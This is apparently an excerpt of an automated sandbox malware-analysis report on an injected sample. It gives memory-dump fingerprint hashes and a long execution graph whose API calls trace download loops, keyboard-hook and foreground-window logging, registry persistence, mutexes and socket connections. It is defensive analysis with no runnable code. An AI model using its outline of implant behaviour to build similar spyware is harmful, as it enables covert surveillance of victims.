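The grouping key includes the "based on PE" flag on purpose: the same API pair inside a legitimately mapped image (a debugger, a .NET runtime helper) is not interesting, while the pair inside an RWX region with no backing file is what the report's "Injects a PE file into a foreign processes" signature is built on.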

Control-flow Graph
• Rendered graph (block data omitted): basic blocks in 701730-7018df, no API calls in this function.
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6e4908244b4748ec556dccba2d58ee11f4ce84379a08788bedadffe6048aaf9
                                                  • Instruction ID: 76bff930fc3ace86f4c6b4da8c3d28c53376f686335ae3872659e4042bbdaa44
                                                  • Opcode Fuzzy Hash: e6e4908244b4748ec556dccba2d58ee11f4ce84379a08788bedadffe6048aaf9
                                                  • Instruction Fuzzy Hash: 00412635704201DBDB298E68D4402BAB7E2AF91321BB887BBD8518B3D1DBBDCD41C752

Control-flow Graph
• Rendered graph (block data omitted): basic blocks in 700db8-7011cf, no API calls in this function.
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 011dc7eb47b02a2f4c4d5c094db364d3497a3d0a2b76391200fbc269c47985d0
                                                  • Instruction ID: e5a20049052b37fbb8cdf7f1c8b5dd74ebcce0962d7dd8078fa9eaffa89dc3b9
                                                  • Opcode Fuzzy Hash: 011dc7eb47b02a2f4c4d5c094db364d3497a3d0a2b76391200fbc269c47985d0
                                                  • Instruction Fuzzy Hash: 3911B131B00209CFCB64EE65C4407BAB7E5AF54370F2986A6D408E7295D779DC81CBE2

Control-flow Graph
• Rendered graph (block data omitted): basic blocks in 15d01d-15d095, no API calls in this function.
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397905010.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_15d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb424f691c46fd0cad93bd52ebe572cc36fa656616848d56796bada6dd3f684c
                                                  • Instruction ID: d65527be609da7153d5001a0363096f4eab385eaae154c3095c38551a73e8675
                                                  • Opcode Fuzzy Hash: cb424f691c46fd0cad93bd52ebe572cc36fa656616848d56796bada6dd3f684c
                                                  • Instruction Fuzzy Hash: 1101DF31504340EAE7204A26E8C4B67FBA8DF41365F28841AFC584E2C2C379984ACBB2
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397905010.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_15d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c909dc9b0dc8ddb4be0472542cbf977a4690041540710eabd54b93307a0d7ed8
                                                  • Instruction ID: e73e4403c00f38fa522718816024ad6700e160746f8946a1fde52e798f743b48
                                                  • Opcode Fuzzy Hash: c909dc9b0dc8ddb4be0472542cbf977a4690041540710eabd54b93307a0d7ed8
                                                  • Instruction Fuzzy Hash: 00015E6150D3C09FD7128B259C94B56BFB4DF53225F1980DBEC988F2E3C2699849CB72
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6b51a01fa36b69ffb3c4639075b7cd5059dc1ede213a91cb9cbc5f795325c1b
                                                  • Instruction ID: 6ad5b8360bcc811cda5064ead538431ce0d8aaed68bf603dd4d4d7971bb818b7
                                                  • Opcode Fuzzy Hash: a6b51a01fa36b69ffb3c4639075b7cd5059dc1ede213a91cb9cbc5f795325c1b
                                                  • Instruction Fuzzy Hash: F1E0D872B04345CBEF15A66490613AD77916FA2324F9083E6C45097686DB788806C762
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (:1$(:1$(:1$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:1$L:1$L:1
                                                  • API String ID: 0-934840861
                                                  • Opcode ID: 3f8e38f70292ae2298013c14017f0f3b4be0da552cce856cf872f09ea8762796
                                                  • Instruction ID: f0c4e59683bfaab672fae36801ab28206dc3f917062052eaf8300622fca53bd8
                                                  • Opcode Fuzzy Hash: 3f8e38f70292ae2298013c14017f0f3b4be0da552cce856cf872f09ea8762796
                                                  • Instruction Fuzzy Hash: 34D10431B04344EFDB158F68C814BAE77E2AF85320F14816AE9159B2D2DB79DD41CBE2

                                                  Execution Graph

                                                  Execution Coverage:5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:4.5%
                                                  Total number of Nodes:1658
                                                  Total number of Limit Nodes:61
execution_graph (rendered graph; the node and edge token stream is omitted here, and the dump is cut off at the end of this page). Format of the stream: a node is "<id> <address> [API names | N API calls | function name]", an edge is "<id>-><id>". Entry node 47275 at 415d41.
API calls present in the graph: InternetOpenW and InternetOpenUrlW at 41b42f, an InternetReadFile loop at 41b456 (edge 47299->47295 closes the loop) and InternetCloseHandle at 41b4a6; RtlAllocateHeap at 4461e1; LoadLibraryA and GetProcAddress at 41cbe1; GetModuleFileNameW at 40ea1c; RegOpenKeyExA at 413584, 413733 and 41353a, RegOpenKeyExW at 413a5e, RegCreateKeyA at 4137aa; CreateProcessA followed by two CloseHandle calls at 407790; StrToIntA at 40f0dc; SetProcessDEPPolicy at 40f27b; CreateThread at 40f003, 40f126, 40f17a, 40f1f6, 40f27e, 40f293 and 40f2a8; a DeleteFileW (40f381) / Sleep (40f36f) retry loop around 40f359. The remaining calls (GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetCurrentProcess, TerminateProcess, GetModuleHandleW, TlsAlloc, LoadLibraryExW, FreeLibrary, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, GetStringTypeW) sit alongside CRT startup and locale symbols such as pre_c_initialization, ___scrt_is_nonwritable_in_current_image and __dosmaperr.
48030->48032 48031 44ae19 48034 4461b8 ___crtLCMapStringA 21 API calls 48031->48034 48035 44ae3a __alloca_probe_16 48031->48035 48032->48022 48033 44aeaf 48050 435ecd 20 API calls _free 48033->48050 48034->48035 48035->48033 48036 448c33 _strftime 11 API calls 48035->48036 48038 44ae8e 48036->48038 48038->48033 48039 44ae9d WideCharToMultiByte 48038->48039 48039->48033 48040 44aedd 48039->48040 48052 435ecd 20 API calls _free 48040->48052 48043 44854a FindHandlerForForeignException 5 API calls 48042->48043 48044 448c5a 48043->48044 48047 448c63 48044->48047 48053 448cbb 10 API calls 3 library calls 48044->48053 48046 448ca3 LCMapStringW 48046->48047 48048 43502b CatchGuardHandler 5 API calls 48047->48048 48049 448cb5 48048->48049 48049->48022 48049->48030 48049->48031 48050->48022 48051->48029 48052->48022 48053->48046 48055 41cc20 LoadLibraryA GetProcAddress 48054->48055 48056 41cc10 GetModuleHandleA GetProcAddress 48054->48056 48057 41cc49 44 API calls 48055->48057 48058 41cc39 LoadLibraryA GetProcAddress 48055->48058 48056->48055 48057->47535 48058->48057 48460 41b539 FindResourceA 48059->48460 48062 43bda0 new 21 API calls 48063 40f428 ctype 48062->48063 48064 4020b7 28 API calls 48063->48064 48065 40f443 48064->48065 48066 401fe2 28 API calls 48065->48066 48067 40f44e 48066->48067 48068 401fd8 11 API calls 48067->48068 48069 40f457 48068->48069 48070 43bda0 new 21 API calls 48069->48070 48071 40f468 ctype 48070->48071 48463 406e13 48071->48463 48073 40f49b 48073->47537 48075 4020df 11 API calls 48074->48075 48095 41bebf 48075->48095 48076 41bf2f 48077 401fd8 11 API calls 48076->48077 48078 41bf61 48077->48078 48079 401fd8 11 API calls 48078->48079 48081 41bf69 48079->48081 48080 41bf31 48082 4041a2 28 API calls 48080->48082 48084 401fd8 11 API calls 48081->48084 48085 41bf3d 48082->48085 48086 40ea5f 48084->48086 48087 401fe2 28 API calls 48085->48087 48096 40fb52 48086->48096 48089 41bf46 48087->48089 48088 401fe2 28 API calls 48088->48095 48090 401fd8 11 API 
calls 48089->48090 48092 41bf4e 48090->48092 48091 401fd8 11 API calls 48091->48095 48094 41cec5 28 API calls 48092->48094 48094->48076 48095->48076 48095->48080 48095->48088 48095->48091 48466 4041a2 48095->48466 48469 41cec5 48095->48469 48097 40fb5e 48096->48097 48099 40fb65 48096->48099 48511 402163 11 API calls 48097->48511 48099->47545 48101 401e6d 48100->48101 48102 401e75 48101->48102 48512 402158 22 API calls 48101->48512 48102->47552 48106 4020df 11 API calls 48105->48106 48107 40532a 48106->48107 48513 4032a0 48107->48513 48109 405346 48109->47560 48518 4051ef 48110->48518 48112 406391 48522 402055 48112->48522 48115 401fe2 48116 401ff1 48115->48116 48117 402039 48115->48117 48118 4023ce 11 API calls 48116->48118 48117->47569 48119 401ffa 48118->48119 48120 40203c 48119->48120 48121 402015 48119->48121 48122 40267a 11 API calls 48120->48122 48556 403098 28 API calls 48121->48556 48122->48117 48125 401fd2 48124->48125 48126 401fc9 48124->48126 48125->47578 48557 4025e0 28 API calls 48126->48557 48558 401fab 48128->48558 48130 40d0ae CreateMutexA GetLastError 48130->47594 48559 41c048 48131->48559 48136 401fe2 28 API calls 48137 41b390 48136->48137 48138 401fd8 11 API calls 48137->48138 48139 41b398 48138->48139 48140 4135e1 31 API calls 48139->48140 48142 41b3ee 48139->48142 48141 41b3c1 48140->48141 48143 41b3cc StrToIntA 48141->48143 48142->47600 48144 41b3e3 48143->48144 48145 41b3da 48143->48145 48146 401fd8 11 API calls 48144->48146 48567 41cffa 22 API calls 48145->48567 48146->48142 48149 407765 48148->48149 48150 413584 3 API calls 48149->48150 48151 40776c 48150->48151 48151->47611 48151->47612 48153 41bd03 48152->48153 48568 40b93f 48153->48568 48155 41bd0b 48155->47628 48157 401f22 48156->48157 48158 401f6a 48156->48158 48159 402252 11 API calls 48157->48159 48165 401f09 48158->48165 48160 401f2b 48159->48160 48161 401f6d 48160->48161 48162 401f46 48160->48162 48601 402336 48161->48601 48600 40305c 28 API calls 48162->48600 48166 402252 11 API 
calls 48165->48166 48167 401f12 48166->48167 48167->47640 48169 4139a0 48168->48169 48170 406e13 28 API calls 48169->48170 48171 4139b5 48170->48171 48172 4020f6 28 API calls 48171->48172 48173 4139c5 48172->48173 48174 4137aa 14 API calls 48173->48174 48175 4139cf 48174->48175 48176 401fd8 11 API calls 48175->48176 48177 4139dc 48176->48177 48177->47690 48179 40209b 48178->48179 48180 4023ce 11 API calls 48179->48180 48181 4020a6 48180->48181 48605 4024ed 48181->48605 48185 4137fa 48184->48185 48187 4137c3 48184->48187 48186 401fd8 11 API calls 48185->48186 48188 40efd9 48186->48188 48189 4137d5 RegSetValueExA RegCloseKey 48187->48189 48188->47691 48189->48185 48191 43bb45 _strftime 48190->48191 48609 43ae83 48191->48609 48193 40eff2 48193->47698 48193->47699 48195 41b631 48194->48195 48196 41b596 GetLocalTime 48194->48196 48197 401fd8 11 API calls 48195->48197 48198 40531e 28 API calls 48196->48198 48199 41b639 48197->48199 48200 41b5d8 48198->48200 48201 401fd8 11 API calls 48199->48201 48202 406383 28 API calls 48200->48202 48203 40f048 48201->48203 48204 41b5e4 48202->48204 48203->47715 48636 402f10 48204->48636 48207 406383 28 API calls 48208 41b5fc 48207->48208 48641 40723b 77 API calls 48208->48641 48210 41b60a 48211 401fd8 11 API calls 48210->48211 48212 41b616 48211->48212 48213 401fd8 11 API calls 48212->48213 48214 41b61f 48213->48214 48215 401fd8 11 API calls 48214->48215 48216 41b628 48215->48216 48217 401fd8 11 API calls 48216->48217 48217->48195 48219 409e3d _wcslen 48218->48219 48220 409e48 48219->48220 48221 409e5f 48219->48221 48222 40da6f 31 API calls 48220->48222 48223 40da6f 31 API calls 48221->48223 48224 409e50 48222->48224 48225 409e67 48223->48225 48226 401f13 28 API calls 48224->48226 48227 401f13 28 API calls 48225->48227 48242 409e5a 48226->48242 48228 409e75 48227->48228 48229 401f09 11 API calls 48228->48229 48231 409e7d 48229->48231 48230 401f09 11 API calls 48232 409eb4 48230->48232 48660 409196 28 API calls 48231->48660 48645 
40a144 48232->48645 48235 409e8f 48661 403014 48235->48661 48239 401f13 28 API calls 48240 409ea4 48239->48240 48241 401f09 11 API calls 48240->48241 48241->48242 48242->48230 48244 41b6c1 GetUserNameW 48243->48244 48876 40417e 48244->48876 48249 403014 28 API calls 48250 41b703 48249->48250 48251 401f09 11 API calls 48250->48251 48252 41b70c 48251->48252 48253 401f09 11 API calls 48252->48253 48254 40f25e 48253->48254 48254->47768 48256 41355b RegQueryValueExA RegCloseKey 48255->48256 48257 40f31f 48255->48257 48256->48257 48257->47641 48257->47796 48259 413a7a RegDeleteValueW 48258->48259 48260 40f3cd 48258->48260 48259->48260 48260->47635 48262 40dd96 48261->48262 48263 41353a 3 API calls 48262->48263 48264 40dd9d 48263->48264 48268 40ddbc 48264->48268 48970 401707 48264->48970 48266 40ddaa 48973 4138b2 RegCreateKeyA 48266->48973 48269 414f65 48268->48269 48270 4020df 11 API calls 48269->48270 48271 414f79 48270->48271 48993 41b944 48271->48993 48274 4020df 11 API calls 48275 414f8f 48274->48275 48276 401e65 22 API calls 48275->48276 48277 414f9d 48276->48277 48278 43bb2c _strftime 40 API calls 48277->48278 48279 414faa 48278->48279 48280 414fbc 48279->48280 48281 414faf Sleep 48279->48281 48282 402093 28 API calls 48280->48282 48281->48280 48283 414fcb 48282->48283 48284 401e65 22 API calls 48283->48284 48285 414fd4 48284->48285 48286 4020f6 28 API calls 48285->48286 48287 414fdf 48286->48287 48288 41beac 28 API calls 48287->48288 48289 414fe7 48288->48289 48997 40489e WSAStartup 48289->48997 48291 414ff1 48292 401e65 22 API calls 48291->48292 48293 414ffa 48292->48293 48294 401e65 22 API calls 48293->48294 48343 415079 48293->48343 48295 415013 48294->48295 48296 401e65 22 API calls 48295->48296 48298 415024 48296->48298 48297 4020f6 28 API calls 48297->48343 48300 401e65 22 API calls 48298->48300 48299 41beac 28 API calls 48299->48343 48301 415035 48300->48301 48303 401e65 22 API calls 48301->48303 48302 406c59 28 API calls 48302->48343 48304 415046 
48303->48304 48307 401e65 22 API calls 48304->48307 48305 402f10 28 API calls 48305->48343 48306 401fe2 28 API calls 48306->48343 48308 415057 48307->48308 48309 401e65 22 API calls 48308->48309 48311 415069 48309->48311 48310 401fd8 11 API calls 48310->48343 49132 40473d 89 API calls 48311->49132 48313 40531e 28 API calls 48313->48343 48314 406383 28 API calls 48314->48343 48315 401e65 22 API calls 48315->48343 48317 4151c7 WSAGetLastError 49133 41cb72 30 API calls 48317->49133 48322 402093 28 API calls 48323 4151d7 48322->48323 48323->48322 48326 401e65 22 API calls 48323->48326 48327 401e8d 11 API calls 48323->48327 48328 43bb2c _strftime 40 API calls 48323->48328 48323->48343 48362 41b580 80 API calls 48323->48362 48363 415aac CreateThread 48323->48363 48364 401fd8 11 API calls 48323->48364 48365 401f09 11 API calls 48323->48365 49134 4052fd 28 API calls 48323->49134 49136 40b08c 85 API calls 48323->49136 49137 404e26 99 API calls 48323->49137 48326->48323 48327->48323 48329 415b0a Sleep 48328->48329 48329->48323 48330 402093 28 API calls 48330->48343 48331 41b580 80 API calls 48331->48343 48334 409097 28 API calls 48334->48343 48335 441ed1 20 API calls 48335->48343 48336 413733 3 API calls 48336->48343 48337 4135e1 31 API calls 48337->48343 48338 40417e 28 API calls 48338->48343 48342 41bc1f 28 API calls 48342->48343 48343->48297 48343->48299 48343->48302 48343->48305 48343->48306 48343->48310 48343->48313 48343->48314 48343->48315 48343->48317 48343->48323 48343->48330 48343->48331 48343->48334 48343->48335 48343->48336 48343->48337 48343->48338 48343->48342 48344 401e65 22 API calls 48343->48344 48998 414f24 48343->48998 49003 40482d 48343->49003 49010 404f51 48343->49010 49025 4048c8 connect 48343->49025 49085 41b871 48343->49085 49088 4145f8 48343->49088 49091 40ddc4 48343->49091 49097 41bcd3 48343->49097 49100 41bdaf 48343->49100 48345 415474 GetTickCount 48344->48345 48346 41bc1f 28 API calls 48345->48346 48359 415491 48346->48359 48348 41bc1f 28 API 
calls 48348->48359 48350 41bdaf 28 API calls 48350->48359 48353 406383 28 API calls 48353->48359 48354 402ea1 28 API calls 48354->48359 48355 402f10 28 API calls 48355->48359 48357 401fd8 11 API calls 48357->48359 48358 401f09 11 API calls 48358->48359 48359->48348 48359->48350 48359->48353 48359->48354 48359->48355 48359->48357 48359->48358 49104 41bb77 48359->49104 49106 41bb27 48359->49106 49111 40f90c 29 API calls 48359->49111 49112 402f31 28 API calls 48359->49112 49113 404c10 48359->49113 49135 404aa1 61 API calls ctype 48359->49135 48362->48323 48363->48323 49320 41ada8 105 API calls 48363->49320 48364->48323 48365->48323 48366->47553 48367->47561 48368->47565 48371 4020df 11 API calls 48370->48371 48372 406c65 48371->48372 48373 4032a0 28 API calls 48372->48373 48374 406c82 48373->48374 48374->47586 48376 40ebdf 48375->48376 48377 4135ae RegQueryValueExA RegCloseKey 48375->48377 48376->47583 48376->47601 48377->48376 48378->47591 48379->47619 48380->47611 48381->47603 48382->47618 48384 401f86 11 API calls 48383->48384 48385 40da8b 48384->48385 48386 40dae0 48385->48386 48387 40daab 48385->48387 48388 40daa1 48385->48388 48391 41c048 GetCurrentProcess 48386->48391 49321 41b645 29 API calls 48387->49321 48390 40dbd4 GetLongPathNameW 48388->48390 48393 40417e 28 API calls 48390->48393 48394 40dae5 48391->48394 48392 40dab4 48397 401f13 28 API calls 48392->48397 48398 40dbe9 48393->48398 48395 40dae9 48394->48395 48396 40db3b 48394->48396 48400 40417e 28 API calls 48395->48400 48399 40417e 28 API calls 48396->48399 48401 40dabe 48397->48401 48402 40417e 28 API calls 48398->48402 48403 40db49 48399->48403 48404 40daf7 48400->48404 48407 401f09 11 API calls 48401->48407 48405 40dbf8 48402->48405 48410 40417e 28 API calls 48403->48410 48411 40417e 28 API calls 48404->48411 49324 40de0c 28 API calls 48405->49324 48407->48388 48408 40dc0b 49325 402fa5 28 API calls 48408->49325 48413 40db5f 48410->48413 48414 40db0d 48411->48414 48412 40dc16 49326 402fa5 28 API 
calls 48412->49326 49323 402fa5 28 API calls 48413->49323 49322 402fa5 28 API calls 48414->49322 48418 40dc20 48421 401f09 11 API calls 48418->48421 48419 40db6a 48422 401f13 28 API calls 48419->48422 48420 40db18 48423 401f13 28 API calls 48420->48423 48424 40dc2a 48421->48424 48425 40db75 48422->48425 48426 40db23 48423->48426 48427 401f09 11 API calls 48424->48427 48428 401f09 11 API calls 48425->48428 48429 401f09 11 API calls 48426->48429 48430 40dc33 48427->48430 48431 40db7e 48428->48431 48432 40db2c 48429->48432 48433 401f09 11 API calls 48430->48433 48434 401f09 11 API calls 48431->48434 48435 401f09 11 API calls 48432->48435 48436 40dc3c 48433->48436 48434->48401 48435->48401 48437 401f09 11 API calls 48436->48437 48438 40dc45 48437->48438 48439 401f09 11 API calls 48438->48439 48440 40dc4e 48439->48440 48440->47677 48441->47688 48442->47711 48444 413759 RegQueryValueExA RegCloseKey 48443->48444 48445 41377d 48443->48445 48444->48445 48445->47670 48446->47703 48449 434563 48447->48449 48448 43bda0 new 21 API calls 48448->48449 48449->48448 48450 40f10c 48449->48450 49327 443001 7 API calls 2 library calls 48449->49327 49328 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48449->49328 49329 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48449->49329 48450->47741 48454->47772 48455->47760 48457->47805 48458->47610 48461 41b556 LoadResource LockResource SizeofResource 48460->48461 48462 40f419 48460->48462 48461->48462 48462->48062 48464 4020b7 28 API calls 48463->48464 48465 406e27 48464->48465 48465->48073 48480 40423a 48466->48480 48470 41ced2 48469->48470 48471 41cf31 48470->48471 48475 41cee2 48470->48475 48472 41cf4b 48471->48472 48473 41d071 28 API calls 48471->48473 48495 41d1d7 28 API calls 48472->48495 48473->48472 48476 41cf1a 48475->48476 48486 41d071 48475->48486 48494 41d1d7 28 API calls 48476->48494 48477 41cf2d 48477->48095 48481 404243 48480->48481 48482 4023ce 11 API calls 
48481->48482 48483 40424e 48482->48483 48484 402569 28 API calls 48483->48484 48485 4041b5 48484->48485 48485->48095 48488 41d079 48486->48488 48487 41d0ab 48487->48476 48488->48487 48489 41d0af 48488->48489 48492 41d093 48488->48492 48506 402725 22 API calls 48489->48506 48496 41d0e2 48492->48496 48494->48477 48495->48477 48497 41d0ec __EH_prolog 48496->48497 48507 402717 22 API calls 48497->48507 48499 41d0ff 48508 41d1ee 11 API calls 48499->48508 48501 41d125 48502 41d15d 48501->48502 48509 402730 11 API calls 48501->48509 48502->48487 48504 41d144 48510 402712 11 API calls std::_Deallocate 48504->48510 48507->48499 48508->48501 48509->48504 48510->48502 48511->48099 48515 4032aa 48513->48515 48514 4032c9 48514->48109 48515->48514 48517 4028e8 28 API calls 48515->48517 48517->48514 48519 4051fb 48518->48519 48528 405274 48519->48528 48521 405208 48521->48112 48523 402061 48522->48523 48524 4023ce 11 API calls 48523->48524 48525 40207b 48524->48525 48552 40267a 48525->48552 48529 405282 48528->48529 48530 405288 48529->48530 48531 40529e 48529->48531 48539 4025f0 48530->48539 48533 4052f5 48531->48533 48534 4052b6 48531->48534 48549 4028a4 22 API calls 48533->48549 48538 40529c 48534->48538 48548 4028e8 28 API calls 48534->48548 48538->48521 48540 402888 22 API calls 48539->48540 48541 402602 48540->48541 48542 402672 48541->48542 48543 402629 48541->48543 48551 4028a4 22 API calls 48542->48551 48547 40263b 48543->48547 48550 4028e8 28 API calls 48543->48550 48547->48538 48548->48538 48550->48547 48553 40268b 48552->48553 48554 4023ce 11 API calls 48553->48554 48555 40208d 48554->48555 48555->48115 48556->48117 48557->48125 48560 41b362 48559->48560 48561 41c055 GetCurrentProcess 48559->48561 48562 4135e1 RegOpenKeyExA 48560->48562 48561->48560 48563 41360f RegQueryValueExA RegCloseKey 48562->48563 48564 413639 48562->48564 48563->48564 48565 402093 28 API calls 48564->48565 48566 41364e 48565->48566 48566->48136 48567->48144 48569 40b947 48568->48569 48574 
402252 48569->48574 48571 40b952 48578 40b967 48571->48578 48573 40b961 48573->48155 48575 4022ac 48574->48575 48576 40225c 48574->48576 48575->48571 48576->48575 48585 402779 11 API calls std::_Deallocate 48576->48585 48579 40b9a1 48578->48579 48580 40b973 48578->48580 48597 4028a4 22 API calls 48579->48597 48586 4027e6 48580->48586 48584 40b97d 48584->48573 48585->48575 48587 4027ef 48586->48587 48588 402851 48587->48588 48589 4027f9 48587->48589 48599 4028a4 22 API calls 48588->48599 48592 402802 48589->48592 48593 402815 48589->48593 48598 402aea 28 API calls __EH_prolog 48592->48598 48595 402813 48593->48595 48596 402252 11 API calls 48593->48596 48595->48584 48596->48595 48598->48595 48600->48158 48602 402347 48601->48602 48603 402252 11 API calls 48602->48603 48604 4023c7 48603->48604 48604->48158 48606 4024f9 48605->48606 48607 40250a 28 API calls 48606->48607 48608 4020b1 48607->48608 48608->47681 48625 43ba8a 48609->48625 48611 43aeaf __cftoe 48611->48193 48612 43aed0 48615 43a837 __cftoe 36 API calls 48612->48615 48613 43ae95 48613->48611 48613->48612 48614 43aeaa 48613->48614 48630 44062d 20 API calls __dosmaperr 48614->48630 48618 43aedc 48615->48618 48619 43af0b 48618->48619 48631 43bacf 40 API calls __Tolower 48618->48631 48622 43af77 48619->48622 48632 43ba36 20 API calls 2 library calls 48619->48632 48633 43ba36 20 API calls 2 library calls 48622->48633 48623 43b03e _strftime 48623->48611 48634 44062d 20 API calls __dosmaperr 48623->48634 48626 43baa2 48625->48626 48627 43ba8f 48625->48627 48626->48613 48635 44062d 20 API calls __dosmaperr 48627->48635 48629 43ba94 __cftoe 48629->48613 48630->48611 48631->48618 48632->48622 48633->48623 48634->48611 48635->48629 48642 401fb0 48636->48642 48638 402f1e 48639 402055 11 API calls 48638->48639 48640 402f2d 48639->48640 48640->48207 48641->48210 48643 4025f0 28 API calls 48642->48643 48644 401fbd 48643->48644 48644->48638 48646 40a162 48645->48646 48647 413584 3 API calls 48646->48647 48648 40a169 
48647->48648 48649 40a197 48648->48649 48650 40a17d 48648->48650 48666 409097 48649->48666 48652 40a182 48650->48652 48653 409ed6 48650->48653 48655 409097 28 API calls 48652->48655 48653->47734 48657 40a190 48655->48657 48694 40a268 29 API calls 48657->48694 48659 40a195 48659->48653 48660->48235 48853 403222 48661->48853 48663 403022 48857 403262 48663->48857 48667 4090ad 48666->48667 48668 402252 11 API calls 48667->48668 48669 4090c7 48668->48669 48695 404267 48669->48695 48671 4090d5 48672 40a1b4 48671->48672 48707 40b927 48672->48707 48675 40a205 48677 402093 28 API calls 48675->48677 48676 40a1dd 48678 402093 28 API calls 48676->48678 48679 40a210 48677->48679 48680 40a1e7 48678->48680 48681 402093 28 API calls 48679->48681 48682 41bcef 28 API calls 48680->48682 48683 40a21f 48681->48683 48684 40a1f5 48682->48684 48685 41b580 80 API calls 48683->48685 48711 40b19f 31 API calls new 48684->48711 48688 40a224 CreateThread 48685->48688 48687 40a1fc 48689 401fd8 11 API calls 48687->48689 48690 40a24b CreateThread 48688->48690 48691 40a23f CreateThread 48688->48691 48719 40a2b8 48688->48719 48689->48675 48692 401f09 11 API calls 48690->48692 48716 40a2c4 48690->48716 48691->48690 48713 40a2a2 48691->48713 48693 40a25f 48692->48693 48693->48653 48694->48659 48852 40a2ae 163 API calls 48694->48852 48696 402888 22 API calls 48695->48696 48697 40427b 48696->48697 48698 404290 48697->48698 48699 4042a5 48697->48699 48705 4042df 22 API calls 48698->48705 48700 4027e6 28 API calls 48699->48700 48704 4042a3 48700->48704 48702 404299 48706 402c48 22 API calls 48702->48706 48704->48671 48705->48702 48706->48704 48708 40b930 48707->48708 48709 40a1d2 48707->48709 48712 40b9a7 28 API calls 48708->48712 48709->48675 48709->48676 48711->48687 48712->48709 48722 40a2f3 48713->48722 48752 40ad11 48716->48752 48794 40a761 48719->48794 48723 40a30c GetModuleHandleA SetWindowsHookExA 48722->48723 48724 40a36e GetMessageA 48722->48724 48723->48724 48726 40a328 GetLastError 
48723->48726 48725 40a380 TranslateMessage DispatchMessageA 48724->48725 48727 40a2ab 48724->48727 48725->48724 48725->48727 48737 41bc1f 48726->48737 48743 441ed1 48737->48743 48740 402093 28 API calls 48741 40a339 48740->48741 48742 4052fd 28 API calls 48741->48742 48744 441edd 48743->48744 48747 441ccd 48744->48747 48746 41bc43 48746->48740 48748 441ce4 48747->48748 48750 441d1b __cftoe 48748->48750 48751 44062d 20 API calls __dosmaperr 48748->48751 48750->48746 48751->48750 48781 40ad1f 48752->48781 48753 40a2cd 48754 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48756 40b93f 28 API calls 48754->48756 48756->48781 48760 40adbf GetWindowTextW 48760->48781 48762 40af17 48765 401f09 11 API calls 48762->48765 48763 41bb77 GetTickCount 48763->48781 48764 40b927 28 API calls 48764->48781 48765->48753 48766 40ae84 Sleep 48766->48781 48767 441ed1 20 API calls 48767->48781 48769 402093 28 API calls 48769->48781 48770 40ae0c 48771 409097 28 API calls 48770->48771 48770->48781 48790 40b19f 31 API calls new 48770->48790 48771->48770 48775 403014 28 API calls 48775->48781 48776 406383 28 API calls 48776->48781 48777 41bcef 28 API calls 48777->48781 48778 40a671 12 API calls 48778->48781 48779 401f09 11 API calls 48779->48781 48780 401fd8 11 API calls 48780->48781 48781->48753 48781->48754 48781->48760 48781->48762 48781->48763 48781->48764 48781->48766 48781->48767 48781->48769 48781->48770 48781->48775 48781->48776 48781->48777 48781->48778 48781->48779 48781->48780 48782 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48781->48782 48783 401f86 48781->48783 48787 434801 23 API calls __onexit 48781->48787 48788 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48781->48788 48789 40907f 28 API calls 48781->48789 48791 40b9b7 28 API calls 48781->48791 48792 40b783 40 API calls 2 library calls 48781->48792 48793 4052fd 28 API calls 48781->48793 48784 401f8e 48783->48784 48785 402252 11 API 
